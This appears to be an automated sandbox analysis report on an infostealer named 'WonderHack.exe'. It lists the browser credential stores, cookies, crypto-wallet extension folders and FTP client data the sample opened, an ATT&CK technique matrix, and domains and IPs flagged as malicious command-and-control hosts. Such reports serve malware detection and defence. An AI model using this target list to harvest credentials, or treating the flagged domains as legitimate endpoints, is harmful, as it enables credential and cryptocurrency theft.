                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                    Source: C:\Users\user\Desktop\WonderHack.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                    Source: Yara matchFile source: 00000002.00000003.2527201915.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: WonderHack.exe PID: 3696, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: Process Memory Space: WonderHack.exe PID: 3696, type: MEMORYSTR
                    Source: Yara matchFile source: 2.2.WonderHack.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.WonderHack.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    211
                    Process Injection
                    11
                    Virtualization/Sandbox Evasion
                    2
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    11
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API
                    Boot or Logon Initialization Scripts1
                    DLL Side-Loading
                    211
                    Process Injection
                    LSASS Memory141
                    Security Software Discovery
                    Remote Desktop Protocol41
                    Data from Local System
                    1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell
                    Logon Script (Windows)Logon Script (Windows)11
                    Deobfuscate/Decode Files or Information
                    Security Account Manager11
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS1
                    Process Discovery
                    Distributed Component Object ModelInput Capture114
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Software Packing
                    LSA Secrets11
                    File and Directory Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials33
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    WonderHack.exe38%VirustotalBrowse
                    WonderHack.exe29%ReversingLabsWin32.Infostealer.Generic
                    WonderHack.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    sendypaster.xyz
                    193.143.1.9
                    truetrue
                      unknown
                      steamcommunity.com
                      23.55.153.106
                      truefalse
                        high
                        lev-tolstoi.com
                        104.21.66.86
                        truefalse
                          high
                          steppriflej.xyz
                          193.143.1.9
                          truetrue
                            unknown
                            supporse-comment.cyou
                            unknown
                            unknowntrue
                              unknown
                              ripe-blade.cyou
                              unknown
                              unknowntrue
                                unknown
                                greywe-snotty.cyou
                                unknown
                                unknowntrue
                                  unknown
                                  hosue-billowy.cyou
                                  unknown
                                  unknowntrue
                                    unknown
                                    bellflamre.click
                                    unknown
                                    unknownfalse
                                      high
                                      smash-boiling.cyou
                                      unknown
                                      unknowntrue
                                        unknown
                                        pollution-raker.cyou
                                        unknown
                                        unknowntrue
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          sendypaster.xyztrue
                                            unknown
                                            steppriflej.xyztrue
                                              unknown
                                              smash-boiling.cyoutrue
                                                unknown
                                                https://steamcommunity.com/profiles/76561199724331900false
                                                  high
                                                  ripe-blade.cyoutrue
                                                    unknown
                                                    https://lev-tolstoi.com/apifalse
                                                      high
                                                      greywe-snotty.cyoutrue
                                                        unknown
                                                        supporse-comment.cyoutrue
                                                          unknown
                                                          hosue-billowy.cyoutrue
                                                            unknown
                                                            bellflamre.clicktrue
                                                              unknown
                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://duckduckgo.com/chrome_newtabWonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://player.vimeo.comWonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://duckduckgo.com/ac/?q=WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://steamcommunity.com/?subsection=broadcastsWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/HU~WonderHack.exe, 00000002.00000003.2527263074.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532232865.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.WonderHack.exe, 00000002.00000003.2479583191.00000000032E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://store.steampowered.com/subscriber_agreement/WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.gstatic.cn/recaptcha/WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://login.sWonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEEWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.valvesoftware.com/legal.htmWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enWonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.youtube.comWonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmpfalse
